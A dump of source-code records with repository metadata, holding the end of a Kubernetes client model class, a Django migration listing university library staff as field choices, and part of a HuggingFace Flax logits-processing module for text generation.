elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1AWSElasticBlockStoreVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"student@workstation.lab.example.com"
] | student@workstation.lab.example.com |
262e68b1e377d555f99bc12cfb6bb2eb9023cf5a | 47d1beba77ebde115c5d41b25a15ef144068c930 | /findingaids/migrations/0019_auto_20161103_1604.py | b73f511547de16968764b57cb516bd6fc376f20a | [] | no_license | uchicago-library/library_website | f32d7dcaf793b4646cac37ba7270715dccf84820 | e5912a17ed2de3a61ede2fbebda4a258664ff696 | refs/heads/master | 2023-08-16T20:20:45.063253 | 2023-08-10T21:19:12 | 2023-08-10T21:19:12 | 39,917,251 | 5 | 4 | null | 2023-08-10T21:19:14 | 2015-07-29T21:27:58 | Python | UTF-8 | Python | false | false | 16,916 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-03 21:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('findingaids', '0018_findingaidspage_banner_feature'),
]
operations = [
migrations.AlterField(
model_name='findingaidspage',
name='content_specialist',
field=models.ForeignKey(choices=[(44, 'Ricardo R Andrade'), (125, 'Jeffry D. Archer'), (85, 'Dean W. Armstrong'), (51, 'Dale Arntson'), (149, 'Kathleen Arthur'), (184, 'Melina Avery'), (1883, 'Shauna Babcock'), (54, 'Brian Balsamo'), (247, 'Terry Banks'), (55, 'Timothy Barnaby'), (177, 'Michelle B Bass'), (167, 'Linda Beezhold'), (205, 'Paul Belloni'), (82, 'David Bietila'), (71, 'Charles Blair'), (4906, 'Emma Boettcher'), (226, 'Steven Boozer'), (90, 'David Borycz'), (83, 'David W. Bottorff'), (225, 'Samuel B Brown'), (182, 'Michael D. Brown'), (99, 'Ellen Bryan'), (43, 'Amy M Buckland'), (211, 'Vicki Burwell-Rankin'), (56, 'Bradley Busenius'), (65, 'Maura Byrne'), (227, 'Sherry Byrne'), (134, 'John Carey'), (248, 'Timothy Clark'), (180, 'Miranda Clower'), (241, 'Steve Coats'), (66, 'Christine Colburn'), (102, 'Evelyn Collier'), (76, 'Kevin A Collier'), (77, 'James Collins'), (78, 'Christopher Cronin'), (250, 'Theodore Cueller'), (249, 'Tyler Danstrom'), (213, 'Renee Darosky'), (126, 'Judith Dartt'), (84, 'Dora Davis'), (235, 'Subrata De'), (86, 'Will Degenhard'), (228, 'Sean Dempsey'), (178, 'Melanie Dial'), (254, 'Thomas Dousa'), (255, 'Thomas Drueke'), (4835, 'Jennifer Dunlap'), (214, 'Ronald Durham'), (96, 'Elizabeth Edwards'), (68, 'Charles Ellington'), (186, 'Michael C Evans'), (201, 'Octavia Fallwell'), (88, 'David Farley'), (140, 'June P. Farris'), (152, 'Kathleen Feeney'), (69, 'Lily Fieg'), (229, 'Sean Filipov'), (179, 'M. Constance Fleischer'), (107, 'Greg Fleming'), (172, 'Lynn Franco'), (2469, 'David H Frankel'), (4815, 'Jennifer Frary'), (212, 'Raymond Gadke'), (148, 'Julia Gardner'), (252, 'Timothy Garrison'), (111, 'Joseph Gerdeman'), (204, 'Patti Gibbons'), (58, 'Barbara Gilbert'), (103, 'Fabian Gonzalez'), (52, 'Ashley Locke Gosselar'), (132, 'Jaymes B Grider'), (116, 'Gerald Hall'), (142, 'Jamal Hamilton'), (79, 'Catherine Hardy'), (232, 'Susan Harkins'), (89, 'Diana Rose Harper'), (118, 'Jamaar Harris'), (119, 'Jennifer Hart'), (166, 'Laurie Haugland'), (154, 'Kiku Hibino'), (4878, 'Taylor Hixson'), (110, 'Geraldine Hogue'), (98, 'Eileen Ielmini'), (253, 'Todd Ito'), (61, 'Brenda Johnson'), (70, 'Charlotte Jones'), (129, 'John Jung'), (135, 'John Kaderbek'), (4816, 'Kera Kelly'), (187, 'Mark Kennel'), (191, 'Michael Kenny'), (59, 'Barbara Kern'), (123, 'Hyerye Kim'), (131, 'Jenny Kim'), (42, 'Anne Knafl'), (207, 'Priya Kuppuraju'), (120, 'Hannah Landsman'), (236, 'Scott Landvatter'), (164, 'David K. Larsen'), (137, 'Jackie Larson'), (267, 'Simon Lee'), (39, 'Andrew D Lee'), (237, 'Sandra Levy'), (192, 'Melanie Levy'), (234, 'Sheri Lewis'), (46, 'Ann Lindsey'), (121, 'Holly Lipschultz'), (100, 'Elisabeth Long'), (168, 'Lyonette Louis-Jacques'), (41, 'Andrew John Lovdahl'), (57, 'Benita Luke'), (108, 'Grace Lyons'), (73, 'Cheryl Malmborg'), (113, 'Gary Mamlin'), (174, 'Amy Mantrone'), (74, 'Clint Marcy'), (175, 'Catherine M. Mardikes'), (158, 'Kristin E Martin'), (4967, 'Susan Martin'), (217, 'Renee Martonik'), (169, 'Janet L Mather'), (4834, 'Anita Marie Mechler'), (200, 'Edd Merkel'), (185, 'Stacey Metralexis'), (50, 'Daniel Meyer'), (130, 'Jon Miller'), (266, 'Yuan Mo'), (159, 'Kiya Moody'), (242, 'Steven Moore'), (189, 'James Mouw'), (75, 'Colleen Mullarkey'), (97, 'Erica Myles'), (269, 'Youli Na'), (62, 'Brittan Nannenga'), (219, 'Rose Navarro'), (2764, 'Olaf Nelson'), (87, 'Daryl Nelson'), (60, 'Benjamin Niespodziany'), (114, 'Greg Nimmo'), (139, 'James Nye'), (47, 'Adrianne Okoh'), (256, 'Tod Olson'), (265, 'Yasmin Omer'), (221, 'Ru Orb'), (48, 'Anderson Orsburn'), (196, 'Natascha Owens'), (128, 'Jee-Young Park'), (4833, 'Arnisha Parker'), (115, 'Gail Parks'), (124, 'James Anthony Patterson'), (243, 'Scott Perry'), (141, 'Julie Piacentine'), (49, 'Aaron Platte'), (222, 'Robert Pleshar'), (206, 'Laura Pontillo'), (91, 'Darryl Poole'), (160, 'Karen Prack'), (173, 'Mallory A Price'), (262, 'Bill Pugh'), (264, 'Xiaowen Qian'), (170, 'Liping Qin'), (209, 'Sheila Ralston'), (210, 'Emily Raney'), (216, 'Laura Ring'), (4842, 'Jason Robertson'), (223, 'Rachel Rosenberg'), (92, 'Darrin Rosenthal'), (45, 'Andrew Rusin'), (194, 'Marlis J. Saleh'), (208, 'Patricia Sayre-McCoy'), (109, 'George Schell'), (183, 'Margaret A. Schilt'), (260, 'William A. Schwesig'), (146, 'Joseph T Scott'), (104, 'Fred Seaton'), (143, 'James Server'), (198, 'Natasha Sharp'), (4879, 'Allyson E Smally'), (199, 'Nancy Spiegel'), (161, 'Kaitlin A Springmier'), (224, 'Rebecca Starkey'), (106, 'Julie R. Stauffer'), (80, 'Carol Stewart'), (244, 'Christopher Alexander Straughn'), (251, 'Teresa E Sullivan'), (1157, 'Sem C Sutter'), (144, 'James M. Swanson'), (93, 'Deborah Taylor'), (64, 'Brandon Tharp'), (72, 'Christie Thomas'), (101, 'Emily Anne Treptow'), (53, 'Andrea Twiss-Brooks'), (188, 'Marcene Tyler'), (81, 'Catherine Uecker'), (151, 'Keith Waclena'), (259, 'Larisa Walsh'), (176, 'Mary Lee Ward'), (231, 'Sarah G. Wenzel'), (94, 'Debra A Werner'), (171, 'Linda Wheatley-Irving'), (263, 'William White'), (190, 'Peggy Wilkins'), (112, "G'Jordan Williams"), (203, 'Patricia A. Williams'), (246, 'Shelia Wright-Coney'), (133, 'Jiaxun Benjamin Wu'), (127, 'Jin Xu'), (268, 'Ayako Yoshimura'), (163, 'Kathy Zadrozny'), (270, 'Yuan Zhou'), (271, 'Xiaoquan Zhu'), (5090, 'Karen Yu')], null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_content_specialist', to='staff.StaffPage'),
),
migrations.AlterField(
model_name='findingaidspage',
name='editor',
field=models.ForeignKey(choices=[(44, 'Ricardo R Andrade'), (125, 'Jeffry D. Archer'), (85, 'Dean W. Armstrong'), (51, 'Dale Arntson'), (149, 'Kathleen Arthur'), (184, 'Melina Avery'), (1883, 'Shauna Babcock'), (54, 'Brian Balsamo'), (247, 'Terry Banks'), (55, 'Timothy Barnaby'), (177, 'Michelle B Bass'), (167, 'Linda Beezhold'), (205, 'Paul Belloni'), (82, 'David Bietila'), (71, 'Charles Blair'), (4906, 'Emma Boettcher'), (226, 'Steven Boozer'), (90, 'David Borycz'), (83, 'David W. Bottorff'), (225, 'Samuel B Brown'), (182, 'Michael D. Brown'), (99, 'Ellen Bryan'), (43, 'Amy M Buckland'), (211, 'Vicki Burwell-Rankin'), (56, 'Bradley Busenius'), (65, 'Maura Byrne'), (227, 'Sherry Byrne'), (134, 'John Carey'), (248, 'Timothy Clark'), (180, 'Miranda Clower'), (241, 'Steve Coats'), (66, 'Christine Colburn'), (102, 'Evelyn Collier'), (76, 'Kevin A Collier'), (77, 'James Collins'), (78, 'Christopher Cronin'), (250, 'Theodore Cueller'), (249, 'Tyler Danstrom'), (213, 'Renee Darosky'), (126, 'Judith Dartt'), (84, 'Dora Davis'), (235, 'Subrata De'), (86, 'Will Degenhard'), (228, 'Sean Dempsey'), (178, 'Melanie Dial'), (254, 'Thomas Dousa'), (255, 'Thomas Drueke'), (4835, 'Jennifer Dunlap'), (214, 'Ronald Durham'), (96, 'Elizabeth Edwards'), (68, 'Charles Ellington'), (186, 'Michael C Evans'), (201, 'Octavia Fallwell'), (88, 'David Farley'), (140, 'June P. Farris'), (152, 'Kathleen Feeney'), (69, 'Lily Fieg'), (229, 'Sean Filipov'), (179, 'M. Constance Fleischer'), (107, 'Greg Fleming'), (172, 'Lynn Franco'), (2469, 'David H Frankel'), (4815, 'Jennifer Frary'), (212, 'Raymond Gadke'), (148, 'Julia Gardner'), (252, 'Timothy Garrison'), (111, 'Joseph Gerdeman'), (204, 'Patti Gibbons'), (58, 'Barbara Gilbert'), (103, 'Fabian Gonzalez'), (52, 'Ashley Locke Gosselar'), (132, 'Jaymes B Grider'), (116, 'Gerald Hall'), (142, 'Jamal Hamilton'), (79, 'Catherine Hardy'), (232, 'Susan Harkins'), (89, 'Diana Rose Harper'), (118, 'Jamaar Harris'), (119, 'Jennifer Hart'), (166, 'Laurie Haugland'), (154, 'Kiku Hibino'), (4878, 'Taylor Hixson'), (110, 'Geraldine Hogue'), (98, 'Eileen Ielmini'), (253, 'Todd Ito'), (61, 'Brenda Johnson'), (70, 'Charlotte Jones'), (129, 'John Jung'), (135, 'John Kaderbek'), (4816, 'Kera Kelly'), (187, 'Mark Kennel'), (191, 'Michael Kenny'), (59, 'Barbara Kern'), (123, 'Hyerye Kim'), (131, 'Jenny Kim'), (42, 'Anne Knafl'), (207, 'Priya Kuppuraju'), (120, 'Hannah Landsman'), (236, 'Scott Landvatter'), (164, 'David K. Larsen'), (137, 'Jackie Larson'), (267, 'Simon Lee'), (39, 'Andrew D Lee'), (237, 'Sandra Levy'), (192, 'Melanie Levy'), (234, 'Sheri Lewis'), (46, 'Ann Lindsey'), (121, 'Holly Lipschultz'), (100, 'Elisabeth Long'), (168, 'Lyonette Louis-Jacques'), (41, 'Andrew John Lovdahl'), (57, 'Benita Luke'), (108, 'Grace Lyons'), (73, 'Cheryl Malmborg'), (113, 'Gary Mamlin'), (174, 'Amy Mantrone'), (74, 'Clint Marcy'), (175, 'Catherine M. Mardikes'), (158, 'Kristin E Martin'), (4967, 'Susan Martin'), (217, 'Renee Martonik'), (169, 'Janet L Mather'), (4834, 'Anita Marie Mechler'), (200, 'Edd Merkel'), (185, 'Stacey Metralexis'), (50, 'Daniel Meyer'), (130, 'Jon Miller'), (266, 'Yuan Mo'), (159, 'Kiya Moody'), (242, 'Steven Moore'), (189, 'James Mouw'), (75, 'Colleen Mullarkey'), (97, 'Erica Myles'), (269, 'Youli Na'), (62, 'Brittan Nannenga'), (219, 'Rose Navarro'), (2764, 'Olaf Nelson'), (87, 'Daryl Nelson'), (60, 'Benjamin Niespodziany'), (114, 'Greg Nimmo'), (139, 'James Nye'), (47, 'Adrianne Okoh'), (256, 'Tod Olson'), (265, 'Yasmin Omer'), (221, 'Ru Orb'), (48, 'Anderson Orsburn'), (196, 'Natascha Owens'), (128, 'Jee-Young Park'), (4833, 'Arnisha Parker'), (115, 'Gail Parks'), (124, 'James Anthony Patterson'), (243, 'Scott Perry'), (141, 'Julie Piacentine'), (49, 'Aaron Platte'), (222, 'Robert Pleshar'), (206, 'Laura Pontillo'), (91, 'Darryl Poole'), (160, 'Karen Prack'), (173, 'Mallory A Price'), (262, 'Bill Pugh'), (264, 'Xiaowen Qian'), (170, 'Liping Qin'), (209, 'Sheila Ralston'), (210, 'Emily Raney'), (216, 'Laura Ring'), (4842, 'Jason Robertson'), (223, 'Rachel Rosenberg'), (92, 'Darrin Rosenthal'), (45, 'Andrew Rusin'), (194, 'Marlis J. Saleh'), (208, 'Patricia Sayre-McCoy'), (109, 'George Schell'), (183, 'Margaret A. Schilt'), (260, 'William A. Schwesig'), (146, 'Joseph T Scott'), (104, 'Fred Seaton'), (143, 'James Server'), (198, 'Natasha Sharp'), (4879, 'Allyson E Smally'), (199, 'Nancy Spiegel'), (161, 'Kaitlin A Springmier'), (224, 'Rebecca Starkey'), (106, 'Julie R. Stauffer'), (80, 'Carol Stewart'), (244, 'Christopher Alexander Straughn'), (251, 'Teresa E Sullivan'), (1157, 'Sem C Sutter'), (144, 'James M. Swanson'), (93, 'Deborah Taylor'), (64, 'Brandon Tharp'), (72, 'Christie Thomas'), (101, 'Emily Anne Treptow'), (53, 'Andrea Twiss-Brooks'), (188, 'Marcene Tyler'), (81, 'Catherine Uecker'), (151, 'Keith Waclena'), (259, 'Larisa Walsh'), (176, 'Mary Lee Ward'), (231, 'Sarah G. Wenzel'), (94, 'Debra A Werner'), (171, 'Linda Wheatley-Irving'), (263, 'William White'), (190, 'Peggy Wilkins'), (112, "G'Jordan Williams"), (203, 'Patricia A. Williams'), (246, 'Shelia Wright-Coney'), (133, 'Jiaxun Benjamin Wu'), (127, 'Jin Xu'), (268, 'Ayako Yoshimura'), (163, 'Kathy Zadrozny'), (270, 'Yuan Zhou'), (271, 'Xiaoquan Zhu'), (5090, 'Karen Yu')], null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_editor', to='staff.StaffPage'),
),
migrations.AlterField(
model_name='findingaidspage',
name='page_maintainer',
field=models.ForeignKey(choices=[(44, 'Ricardo R Andrade'), (125, 'Jeffry D. Archer'), (85, 'Dean W. Armstrong'), (51, 'Dale Arntson'), (149, 'Kathleen Arthur'), (184, 'Melina Avery'), (1883, 'Shauna Babcock'), (54, 'Brian Balsamo'), (247, 'Terry Banks'), (55, 'Timothy Barnaby'), (177, 'Michelle B Bass'), (167, 'Linda Beezhold'), (205, 'Paul Belloni'), (82, 'David Bietila'), (71, 'Charles Blair'), (4906, 'Emma Boettcher'), (226, 'Steven Boozer'), (90, 'David Borycz'), (83, 'David W. Bottorff'), (225, 'Samuel B Brown'), (182, 'Michael D. Brown'), (99, 'Ellen Bryan'), (43, 'Amy M Buckland'), (211, 'Vicki Burwell-Rankin'), (56, 'Bradley Busenius'), (65, 'Maura Byrne'), (227, 'Sherry Byrne'), (134, 'John Carey'), (248, 'Timothy Clark'), (180, 'Miranda Clower'), (241, 'Steve Coats'), (66, 'Christine Colburn'), (102, 'Evelyn Collier'), (76, 'Kevin A Collier'), (77, 'James Collins'), (78, 'Christopher Cronin'), (250, 'Theodore Cueller'), (249, 'Tyler Danstrom'), (213, 'Renee Darosky'), (126, 'Judith Dartt'), (84, 'Dora Davis'), (235, 'Subrata De'), (86, 'Will Degenhard'), (228, 'Sean Dempsey'), (178, 'Melanie Dial'), (254, 'Thomas Dousa'), (255, 'Thomas Drueke'), (4835, 'Jennifer Dunlap'), (214, 'Ronald Durham'), (96, 'Elizabeth Edwards'), (68, 'Charles Ellington'), (186, 'Michael C Evans'), (201, 'Octavia Fallwell'), (88, 'David Farley'), (140, 'June P. Farris'), (152, 'Kathleen Feeney'), (69, 'Lily Fieg'), (229, 'Sean Filipov'), (179, 'M. Constance Fleischer'), (107, 'Greg Fleming'), (172, 'Lynn Franco'), (2469, 'David H Frankel'), (4815, 'Jennifer Frary'), (212, 'Raymond Gadke'), (148, 'Julia Gardner'), (252, 'Timothy Garrison'), (111, 'Joseph Gerdeman'), (204, 'Patti Gibbons'), (58, 'Barbara Gilbert'), (103, 'Fabian Gonzalez'), (52, 'Ashley Locke Gosselar'), (132, 'Jaymes B Grider'), (116, 'Gerald Hall'), (142, 'Jamal Hamilton'), (79, 'Catherine Hardy'), (232, 'Susan Harkins'), (89, 'Diana Rose Harper'), (118, 'Jamaar Harris'), (119, 'Jennifer Hart'), (166, 'Laurie Haugland'), (154, 'Kiku Hibino'), (4878, 'Taylor Hixson'), (110, 'Geraldine Hogue'), (98, 'Eileen Ielmini'), (253, 'Todd Ito'), (61, 'Brenda Johnson'), (70, 'Charlotte Jones'), (129, 'John Jung'), (135, 'John Kaderbek'), (4816, 'Kera Kelly'), (187, 'Mark Kennel'), (191, 'Michael Kenny'), (59, 'Barbara Kern'), (123, 'Hyerye Kim'), (131, 'Jenny Kim'), (42, 'Anne Knafl'), (207, 'Priya Kuppuraju'), (120, 'Hannah Landsman'), (236, 'Scott Landvatter'), (164, 'David K. Larsen'), (137, 'Jackie Larson'), (267, 'Simon Lee'), (39, 'Andrew D Lee'), (237, 'Sandra Levy'), (192, 'Melanie Levy'), (234, 'Sheri Lewis'), (46, 'Ann Lindsey'), (121, 'Holly Lipschultz'), (100, 'Elisabeth Long'), (168, 'Lyonette Louis-Jacques'), (41, 'Andrew John Lovdahl'), (57, 'Benita Luke'), (108, 'Grace Lyons'), (73, 'Cheryl Malmborg'), (113, 'Gary Mamlin'), (174, 'Amy Mantrone'), (74, 'Clint Marcy'), (175, 'Catherine M. Mardikes'), (158, 'Kristin E Martin'), (4967, 'Susan Martin'), (217, 'Renee Martonik'), (169, 'Janet L Mather'), (4834, 'Anita Marie Mechler'), (200, 'Edd Merkel'), (185, 'Stacey Metralexis'), (50, 'Daniel Meyer'), (130, 'Jon Miller'), (266, 'Yuan Mo'), (159, 'Kiya Moody'), (242, 'Steven Moore'), (189, 'James Mouw'), (75, 'Colleen Mullarkey'), (97, 'Erica Myles'), (269, 'Youli Na'), (62, 'Brittan Nannenga'), (219, 'Rose Navarro'), (2764, 'Olaf Nelson'), (87, 'Daryl Nelson'), (60, 'Benjamin Niespodziany'), (114, 'Greg Nimmo'), (139, 'James Nye'), (47, 'Adrianne Okoh'), (256, 'Tod Olson'), (265, 'Yasmin Omer'), (221, 'Ru Orb'), (48, 'Anderson Orsburn'), (196, 'Natascha Owens'), (128, 'Jee-Young Park'), (4833, 'Arnisha Parker'), (115, 'Gail Parks'), (124, 'James Anthony Patterson'), (243, 'Scott Perry'), (141, 'Julie Piacentine'), (49, 'Aaron Platte'), (222, 'Robert Pleshar'), (206, 'Laura Pontillo'), (91, 'Darryl Poole'), (160, 'Karen Prack'), (173, 'Mallory A Price'), (262, 'Bill Pugh'), (264, 'Xiaowen Qian'), (170, 'Liping Qin'), (209, 'Sheila Ralston'), (210, 'Emily Raney'), (216, 'Laura Ring'), (4842, 'Jason Robertson'), (223, 'Rachel Rosenberg'), (92, 'Darrin Rosenthal'), (45, 'Andrew Rusin'), (194, 'Marlis J. Saleh'), (208, 'Patricia Sayre-McCoy'), (109, 'George Schell'), (183, 'Margaret A. Schilt'), (260, 'William A. Schwesig'), (146, 'Joseph T Scott'), (104, 'Fred Seaton'), (143, 'James Server'), (198, 'Natasha Sharp'), (4879, 'Allyson E Smally'), (199, 'Nancy Spiegel'), (161, 'Kaitlin A Springmier'), (224, 'Rebecca Starkey'), (106, 'Julie R. Stauffer'), (80, 'Carol Stewart'), (244, 'Christopher Alexander Straughn'), (251, 'Teresa E Sullivan'), (1157, 'Sem C Sutter'), (144, 'James M. Swanson'), (93, 'Deborah Taylor'), (64, 'Brandon Tharp'), (72, 'Christie Thomas'), (101, 'Emily Anne Treptow'), (53, 'Andrea Twiss-Brooks'), (188, 'Marcene Tyler'), (81, 'Catherine Uecker'), (151, 'Keith Waclena'), (259, 'Larisa Walsh'), (176, 'Mary Lee Ward'), (231, 'Sarah G. Wenzel'), (94, 'Debra A Werner'), (171, 'Linda Wheatley-Irving'), (263, 'William White'), (190, 'Peggy Wilkins'), (112, "G'Jordan Williams"), (203, 'Patricia A. Williams'), (246, 'Shelia Wright-Coney'), (133, 'Jiaxun Benjamin Wu'), (127, 'Jin Xu'), (268, 'Ayako Yoshimura'), (163, 'Kathy Zadrozny'), (270, 'Yuan Zhou'), (271, 'Xiaoquan Zhu'), (5090, 'Karen Yu')], null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_maintainer', to='staff.StaffPage'),
),
]
| [
"jej@moss.lib.uchicago.edu"
] | jej@moss.lib.uchicago.edu |
2e028dca7ed2e92d073356ef6d2bee07d82639ca | ff0c718b4be5f26ae0ead4b6419255747c679c00 | /src/transformers/generation_flax_logits_process.py | 12442917759b91ac3ce450e5ea9c8740bb76d225 | [
"Apache-2.0"
] | permissive | elgeish/transformers | cb80d4026ebed67eb2ea8efd07d972f03ceb479f | c016dbdbdaf79339ae6d275d4651dc9f380be055 | refs/heads/master | 2021-11-25T19:28:09.297523 | 2021-11-06T14:33:47 | 2021-11-06T14:33:47 | 245,088,820 | 1 | 3 | Apache-2.0 | 2020-03-05T06:43:47 | 2020-03-05T06:43:46 | null | UTF-8 | Python | false | false | 11,502 | py | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
from abc import ABC
import jax
import jax.lax as lax
import jax.numpy as jnp
from .file_utils import add_start_docstrings
from .utils.logging import get_logger
logger = get_logger(__name__)
LOGITS_PROCESSOR_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`jnp.ndarray` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~transformers.PreTrainedTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
scores (:obj:`jnp.ndarray` of shape :obj:`(batch_size, config.vocab_size)`):
Prediction scores of a language modeling head. These can be logits for each vocabulary when not using beam
search or log softmax for each vocabulary token when using beam search
kwargs:
Additional logits processor specific kwargs.
Return:
:obj:`jnp.ndarray` of shape :obj:`(batch_size, config.vocab_size)`: The processed prediction scores.
"""
class FlaxLogitsProcessor(ABC):
"""Abstract base class for all logit processors that can be applied during generation."""
@add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray) -> jnp.ndarray:
"""Flax method for processing logits."""
raise NotImplementedError(
f"{self.__class__} is an abstract class. Only classes inheriting this class can be called."
)
class FlaxLogitsWarper(ABC):
"""Abstract base class for all logit warpers that can be applied during generation with multinomial sampling."""
@add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray) -> jnp.ndarray:
"""Flax method for warping logits."""
raise NotImplementedError(
f"{self.__class__} is an abstract class. Only classes inheriting this class can be called."
)
class FlaxLogitsProcessorList(list):
"""
This class can be used to create a list of :class:`~transformers.FlaxLogitsProcessor` or
:class:`~transformers.FlaxLogitsWarper` to subsequently process a :obj:`scores` input tensor. This class inherits
from list and adds a specific `__call__` method to apply each :class:`~transformers.FlaxLogitsProcessor` or
:class:`~transformers.FlaxLogitsWarper` to the inputs.
"""
@add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int, **kwargs) -> jnp.ndarray:
for processor in self:
function_args = inspect.signature(processor.__call__).parameters
if len(function_args) > 3:
if not all(arg in kwargs for arg in list(function_args.keys())[2:]):
raise ValueError(
f"Make sure that all the required parameters: {list(function_args.keys())} for "
f"{processor.__class__} are passed to the logits processor."
)
scores = processor(input_ids, scores, cur_len, **kwargs)
else:
scores = processor(input_ids, scores, cur_len)
return scores
class FlaxTemperatureLogitsWarper(FlaxLogitsWarper):
r"""
:class:`transformers.LogitsWarper` for temperature (exponential scaling output probability distribution).
Args:
temperature (:obj:`float`):
The value used to module the logits distribution.
"""
def __init__(self, temperature: float):
if not isinstance(temperature, float) or not (temperature > 0):
raise ValueError(f"`temperature` has to be a strictly positive float, but is {temperature}")
self.temperature = temperature
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
scores = scores / self.temperature
return scores
class FlaxTopPLogitsWarper(FlaxLogitsWarper):
"""
:class:`transformers.LogitsWarper` that performs top-p, i.e. restricting to top tokens summing to prob_cut_off <=
prob_cut_off.
Args:
top_p (:obj:`float`):
If set to < 1, only the most probable tokens with probabilities that add up to :obj:`top_p` or higher are
kept for generation.
filter_value (:obj:`float`, `optional`, defaults to :obj:`-float("Inf")`):
All filtered values will be set to this float value.
min_tokens_to_keep (:obj:`int`, `optional`, defaults to 1):
Minimum number of tokens that cannot be filtered.
"""
def __init__(self, top_p: float, filter_value: float = -float("Inf"), min_tokens_to_keep: int = 1):
if not isinstance(top_p, float) or (top_p < 0 or top_p > 1.0):
raise ValueError(f"`top_p` has to be a float > 0 and < 1, but is {top_p}")
self.top_p = top_p
self.filter_value = filter_value
self.min_tokens_to_keep = min_tokens_to_keep
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
topk_scores, topk_indices = lax.top_k(scores, scores.shape[-1])
mask_scores = jnp.full_like(scores, self.filter_value)
cumulative_probs = jax.nn.softmax(topk_scores, axis=-1).cumsum(axis=-1)
score_mask = cumulative_probs < self.top_p
# include the token that is higher than top_p as well
score_mask |= jax.ops.index_update(jnp.roll(score_mask, 1), jax.ops.index[:, 0], True)
# min tokens to keep
score_mask = jax.ops.index_update(score_mask, jax.ops.index[:, : self.min_tokens_to_keep], True)
topk_next_scores = jnp.where(score_mask, topk_scores, mask_scores)
next_scores = jax.lax.sort_key_val(topk_indices, topk_next_scores)[-1]
return next_scores
class FlaxTopKLogitsWarper(FlaxLogitsWarper):
r"""
:class:`transformers.LogitsWarper` that performs top-k, i.e. restricting to the k highest probability elements.
Args:
top_k (:obj:`int`):
The number of highest probability vocabulary tokens to keep for top-k-filtering.
filter_value (:obj:`float`, `optional`, defaults to :obj:`-float("Inf")`):
All filtered values will be set to this float value.
min_tokens_to_keep (:obj:`int`, `optional`, defaults to 1):
Minimum number of tokens that cannot be filtered.
"""
def __init__(self, top_k: int, filter_value: float = -float("Inf"), min_tokens_to_keep: int = 1):
if not isinstance(top_k, int) or top_k <= 0:
raise ValueError(f"`top_k` has to be a strictly positive integer, but is {top_k}")
self.top_k = top_k
self.filter_value = filter_value
self.min_tokens_to_keep = min_tokens_to_keep
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
batch_size, vocab_size = scores.shape
next_scores_flat = jnp.full(batch_size * vocab_size, self.filter_value)
topk = min(max(self.top_k, self.min_tokens_to_keep), scores.shape[-1]) # Safety check
topk_scores, topk_indices = lax.top_k(scores, topk)
shift = jnp.broadcast_to((jnp.arange(batch_size) * vocab_size)[:, None], (batch_size, topk)).flatten()
topk_scores_flat = topk_scores.flatten()
topk_indices_flat = topk_indices.flatten() + shift
next_scores_flat = jax.ops.index_update(next_scores_flat, topk_indices_flat, topk_scores_flat)
next_scores = next_scores_flat.reshape(batch_size, vocab_size)
return next_scores
class FlaxForcedBOSTokenLogitsProcessor(FlaxLogitsProcessor):
r"""
:class:`~transformers.FlaxLogitsProcessor` that enforces the specified token as the first generated token.
Args:
bos_token_id (:obj:`int`):
The id of the token to force as the first generated token.
"""
def __init__(self, bos_token_id: int):
self.bos_token_id = bos_token_id
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
new_scores = jnp.full(scores.shape, -float("inf"))
apply_penalty = 1 - jnp.bool_(cur_len - 1)
scores = jnp.where(
apply_penalty, jax.ops.index_update(new_scores, jax.ops.index[:, self.bos_token_id], 0), scores
)
return scores
class FlaxForcedEOSTokenLogitsProcessor(FlaxLogitsProcessor):
r"""
:class:`~transformers.FlaxLogitsProcessor` that enforces the specified token as the last generated token when
:obj:`max_length` is reached.
Args:
max_length (:obj:`int`):
The maximum length of the sequence to be generated.
eos_token_id (:obj:`int`):
The id of the token to force as the last generated token when :obj:`max_length` is reached.
"""
def __init__(self, max_length: int, eos_token_id: int):
self.max_length = max_length
self.eos_token_id = eos_token_id
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
new_scores = jnp.full(scores.shape, -float("inf"))
apply_penalty = 1 - jnp.bool_(cur_len - self.max_length + 1)
scores = jnp.where(
apply_penalty, jax.ops.index_update(new_scores, jax.ops.index[:, self.eos_token_id], 0), scores
